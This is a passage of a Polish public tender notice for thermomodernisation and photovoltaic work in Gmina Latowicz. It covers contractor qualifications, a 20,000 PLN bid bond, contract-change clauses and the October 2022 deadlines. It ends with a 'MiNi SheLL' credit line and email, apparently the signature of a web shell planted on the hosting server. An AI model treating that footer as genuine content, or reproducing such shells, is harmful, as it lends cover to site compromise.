zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, w<br/>tym:<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy, to w tym okresie, wykonał w sposób należyty co najmniej<br/>2 roboty budowlane, z których każda polegała na termomodernizacji budynku o łącznej wartości<br/>robót nie mniejszej niż 200 000,00 zł.<br/>b) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy, to w tym okresie, wykonał w sposób należyty co najmniej<br/>2 roboty budowlane, z których każda polegała na wykonaniu instalacji fotowoltaicznych o łącznej<br/>mocy instalacji (w ramach jednej roboty budowlanej) min. 20 kWp.<br/>UWAGA<br/>1) Za wykonanie roboty budowlanej Zamawiający uzna doprowadzenie do wystawienia przez<br/>inwestora protokołu odbioru końcowego lub innego równoważnego dokumentu;<br/>2) W przypadku, gdy Wykonawca realizował zamówienie jako jeden z grupy Wykonawców<br/>(konsorcjum) może powoływać się jedynie na swoje własne, realne doświadczenie, które zdobył<br/>realizując daną część zamówienia, która została mu przypisana w ramach grupy, tzn. może<br/>wykazywać się doświadczeniem jedynie w zakresie, jaki rzeczywiście wykonywał.<br/>Doświadczenia nie uzyskuje się poprzez sam udział w konsorcjum, lecz poprzez konkretne<br/>czynności realizowane w jego ramach.<br/>3) Jeżeli zakres robót przedstawionych w dokumencie złożonym na potwierdzenie, że roboty<br/>budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, jest szerszy od powyżej określonego przez Zamawiającego należy w<br/>wykazie robót budowlanych podać wartość robót potwierdzających spełnienie warunku udziału w<br/>postępowaniu.<br/>4) Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, kwoty będą wyrażone w walucie obcej, kwoty te zostaną przeliczone na PLN wg<br/>średniego kursu PLN w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski<br/>(Tabela A kursów średnich walut obcych) w dniu zamieszczenia ogłoszenia w Dzienniku<br/>Urzędowym Unii Europejskiej (DUUE). Jeżeli w dniu opublikowania ogłoszenia o zamówieniu w<br/>DUUE, Narodowy Bank Polski nie opublikuje tabeli kursów walut, Wykonawca winien przyjąć<br/>kurs przeliczeniowy według ostatniej tabeli kursów NBP, opublikowanej przed dniem publikacji<br/>ogłoszenia o zamówieniu w DUUE.<br/>5) Wykonawca jest obowiązany wykazać spełnienie warunków udziału w postępowaniu<br/>określonych w Ogłoszeniu o zamówieniu i SWZ, w sposób i za pomocą dowodów określonych w<br/>ustawie Pzp, w Rozporządzeniu Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz Ogłoszeniu o<br/>zamówieniu i w SWZ.<br/>4.2 dysponuje lub będzie dysponował osobami niezbędnymi do wykonania niniejszego<br/>zamówienia, tj. co najmniej:<br/>a) dysponuje lub będzie dysponował co najmniej jedną osobą zdolną do wykonywania instalacji<br/>fotowoltaicznych, która będzie uczestniczyć w wykonywaniu zamówienia tj. posiadającą<br/>doświadczenie w wykonywaniu instalacji fotowoltaicznych, która wykonywała osobiście minimum<br/>2 instalacje fotowoltaiczne o mocy min. 20kW w systemie ongrid.<br/>(połączonym z zewnętrzną siecią dystrybucyjną)<br/>b) dysponuje lub będzie dysponował co najmniej jedną osobą zdolną do wykonywania<br/>zamówienia jako Kierownik robót elektrycznych, która będzie uczestniczyć w wykonywaniu<br/>zamówienia tj. posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń wydane na<br/>podstawie Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w<br/>sprawie samodzielnych funkcji technicznych w budownictwie lub ważne uprawnienia, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub na podstawie<br/>przepisów obowiązujących w innych krajach* oraz posiadającą min. 3- letnie doświadczenie<br/>zawodowe,<br/>c) dysponuje lub będzie dysponował co najmniej jedną osobą zdolną do wykonywania<br/>zamówienia jako Kierownik robót budowlanych, która będzie uczestniczyć w wykonywaniu<br/>zamówienia tj. posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej<br/>bez ograniczeń wydane na podstawie Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia<br/>11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub ważne<br/>uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub<br/>na podstawie przepisów obowiązujących w innych krajach* oraz posiadającą min. 3- letnie<br/>doświadczenie zawodowe,<br/>d) dysponuje lub będzie dysponował co najmniej jedną osobą zdolną do wykonywania<br/>zamówienia jako Kierownik robót sanitarnych, która będzie uczestniczyć w wykonywaniu<br/>zamówienia tj. posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń wydane na podstawie Rozporządzenia Ministra Infrastruktury i<br/>Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w<br/>budownictwie lub ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub na podstawie przepisów obowiązujących w innych krajach*<br/>oraz posiadającą min. 3-letnie doświadczenie zawodowe,<br/>Przez uprawnienia budowlane do kierowania robotami budowlanymi rozumie się uprawnienia do<br/>sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie Prawa<br/>Budowlanego (tj. Dz. U. 2020 r poz. 1333 z późn. zm.) albo odpowiadające im inne ważne<br/>uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów. Za samodzielną<br/>funkcję techniczną w budownictwie uważa się działalność związaną z koniecznością fachowej<br/>oceny zjawisk technicznych lub samodzielnego rozwiązania zagadnień architektonicznych i<br/>technicznych oraz techniczno-organizacyjnych. Samodzielne funkcje techniczne w budownictwie<br/>mogą wykonywać wyłącznie osoby posiadające odpowiednie wykształcenie techniczne i<br/>praktykę zawodową, dostosowane do rodzaju skomplikowania działalności i innych wymagań<br/>związanych z wykonywaną funkcją, stwierdzone decyzją, zwaną uprawnieniami budowlanymi<br/>(zgodnie z art. 12 Ustawy z dnia 7 lipca 1994r Prawo Budowlane tj. Dz. U. 2020 r poz. 1333 z<br/>późn. zm.). Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień<br/>budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia<br/>wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz<br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stronach umowy o Europejskim<br/>Obszarze Gospodarczym, z zastrzeżeniem przepisu art. 12a ustawy Prawo budowlane (tj. Dz. U.<br/>2020 r poz. 1333 z późn. zm.) oraz przepisów ustawy z 22 grudnia 2015 r, o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.<br/>U. z 2020 r., poz. 220).<br/>Warunek udziału w postępowaniu dotyczący zdolności technicznej i zawodowej, w zakresie<br/>doświadczenia zawodowego, musi być spełniony przez Wykonawcę samodzielnie, przez co<br/>najmniej jeden podmiot udostępniający wiedzę i doświadczenie (podwykonawcę) samodzielnie,<br/>w przypadku Wykonawców występujących wspólnie - samodzielnie przez co najmniej jednego z<br/>Wykonawców występujących wspólnie. Nie jest dopuszczalne łączenie (sumowanie) wyżej<br/>wymaganego doświadczenia różnych podmiotów zaangażowanych w realizację zamówienia.<br/>Jako wykonanie (zakończenie) zadania należy rozumieć podpisanie protokołu odbioru<br/>końcowego robót lub równoważnego dokumentu bez uwag.<br/>UWAGA:<br/>1. Zamawiający uzna powyższy warunek również za spełniony jeżeli Wykonawca dysponować<br/>będzie osobami posiadającymi kwalifikacje równoważne oraz wydane w oparciu o wcześniej<br/>obowiązujące przepisy.<br/>2. Zamawiający dopuszcza kwalifikacje, zdobyte w innych państwach, na zasadach określonych<br/>w art. 12 ustawy Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia<br/>2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz. U. z 2020 r. , poz. 220 ze zm.).<br/>3. Jeżeli członkowie zespołu Wykonawcy nie posługują się językiem polskim w stopniu biegłym,<br/>wówczas we wszelkich kontaktach pomiędzy tymi osobami a Zamawiającym, Wykonawca<br/>zobowiązany jest do zapewnienia udziału tłumacza z języka, którym posługuje się dana<br/>osoba/osoby na język polski, i który przetłumaczy rozmowę/korespondencję pomiędzy taką<br/>osobą/osobami, a Zamawiającym. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie spełnianiu warunków udziału w postępowaniu – załącznik nr<br/>2 do SWZ<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej,<br/>b) oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej<br/>a) informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem (załącznik Wykonawcy);<br/>b) dokumentów potwierdzających, ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności w zakresie przedmiotu zamówienia na wymaganą kwotę w<br/>warunkach zamówienia.<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeśli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2)wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami;<br/>10.1/ Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania<br/>ofert, wnieść wadium w kwocie: 20 000,00 zł. (słownie: dwadzieścia tysięcy złotych).<br/>10.2/ Wadium musi obejmować pełen okres związania.<br/>10.3/ Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>10.4/ Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego: numer rachunku: 08 9226 0005 0040 0552 2000 0160 w Banku Spółdzielczym w<br/>Mińsku Mazowiecki Oddział w Latowiczu w tytule przelewu powołując się na nazwę postępowania.<br/>W przypadku wnoszenia wadium w pieniądzu, Zamawiający uzna je za wniesione skutecznie jedynie w<br/>przypadku wpływu pieniędzy na rachunek bankowy Zamawiającego przed upływem terminu składania<br/>ofert.<br/>10.2/ Wadium wnoszone w poręczeniach lub gwarancjach, o których mowa w ust. 10.3/ pkt b<br/>- d należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego<br/>kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>10.3/ W przypadku wnoszenia przez wykonawcę wadium w formie gwarancji/poręczenia,<br/>gwarancja/poręczenie powinny być sporządzone zgodnie z obowiązującym prawem i zawierać<br/>następujące elementy:<br/>• nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego),<br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub<br/>poręczeniu musi być: Gmina Latowicz,<br/>• określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>• kwotę gwarancji/poręczenia,<br/>• termin ważności gwarancji/poręczenia,<br/>• zobowiązanie gwaranta, do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze<br/>pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu –<br/>załącznik nr 2 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 20000,00 PLN <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> - Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W zakresie:<br/>1) zmiana zakresu lub sposobu realizacji Przedmiotu Umowy w przypadku zaistnienia okoliczności niezależnych od Zamawiającego i Wykonawcy, których nie można było wcześniej<br/>przewidzieć przy zachowaniu należytej staranności, a które mają wpływ na Przedmiot Umowy,<br/>2) zmiana sposobu realizacji Przedmiot Umowy z uwagi na zmiany organizacyjne<br/>Zamawiającego;<br/>3) zmiana terminu realizacji Przedmiotu Umowy z uwagi na zmiany innych umów, których Stroną<br/>jest Zamawiający, a które wykazują związek z Umową lub mają wpływ na jej realizację;<br/>4) zmiana terminu realizacji Przedmiotu Umowy z uwagi na przyczyny niezależne od<br/>Zamawiającego i Wykonawcy, których nie można było wcześniej przewidzieć przy zachowaniu<br/>należytej staranności, a które mają wpływ na Przedmiot Umowy;<br/>zarze ochrony danych osobowych powierzanych w ramach realizacji Umowy.<br/>5) zmiany osób wyznaczonych do realizacji Umowy w sposób określony w Opisie Przedmiotu<br/>Zamówienia, :<br/>a) śmierci,<br/>b) rozwiązania stosunku pracy,<br/>c) choroby powyżej 30 dni potwierdzonej zaświadczeniem lekarskim,<br/>d) innych zdarzeń losowych zaistniałych z przyczyn niezależnych od Zamawiającego oraz<br/>Wykonawcy, skutkujących obiektywną niemożliwością wykonywania czynności przez daną<br/>osobę, wynikających z okoliczności, których mimo zachowania należytej staranności nie można<br/>było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego.<br/>2. Zmiany, o których mowa w ust. 1 nie mogą powodować zwiększenia wynagrodzenia<br/>należnego Wykonawcy.<br/>3. Zamawiający dopuszcza zmiany postanowień Umowy w następującym zakresie:<br/>1) zmiana Umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia,<br/>których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości<br/>pierwotnej Umowy a zmiany te nie powodują zmiany ogólnego charakteru Umowy;<br/>2) okoliczności związane z wystąpieniem COVID-19, jeżeli wpływają na należyte wykonanie<br/>Umowy.<br/>4. Jeżeli w toku realizacji Przedmiotu umowy zajdzie konieczność wykonania robót dodatkowych<br/>lub innych robót niezbędnych do prawidłowego wykonania Przedmiotu umowy, a które nie<br/>zostały ujęte w dokumentacji projektowej (bądź nie są elementem robót budowlanych<br/>wskazanych w dokumentacji projektowej), Strony zobligowane są potwierdzić zakres tych robót<br/>oraz zasadność ich wykonania w protokole konieczności. Spisanie protokołu konieczności, nie<br/>jest równoznaczne z udzieleniem Wykonawcy zlecenia na wykonanie robót dodatkowych oraz<br/>nie upoważnia Wykonawcy do przystąpienia do ich wykonania. Wykonawca nie ma prawa<br/>wykonać żadnych robót, o których mowa powyżej bez uzyskania zgody Zamawiającego<br/>wyrażonej na piśmie i aneksu do umowy. Wykonanie robót bez takiej zgody spowoduje, iż<br/>Zamawiający będzie miał prawo do odmowy wypłaty wynagrodzenia za te roboty. Konieczność<br/>zmian, musi być udokumentowana odpowiednimi zapisami upoważnionych przedstawicieli<br/>Wykonawcy i Zamawiającego (np. w dzienniku budowy, protokołach). Zmiana umowy może<br/>nastąpić na piśmie w drodze aneksu, pod rygorem nieważności.<br/>5. Zamawiający zastrzega sobie możliwość odstąpienia od Umowy:<br/>1) w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie Umowy nie leży w<br/>interesie publicznym lub dalsze wykonywanie Umowy może zagrozić istotnemu interesowi<br/>bezpieczeństwa państwa lub bezpieczeństwu publicznemu, a czego nie można było przewidzieć<br/>w chwili zawarcia Umowy, w terminie 30 dni od powzięcia wiadomości o zaistnieniu istotnej<br/>zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego<br/>nie można było przewidzieć w chwili zawarcia umowy, lub dalsze wykonywanie umowy może<br/>zagrozić podstawowemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-27 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-27 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com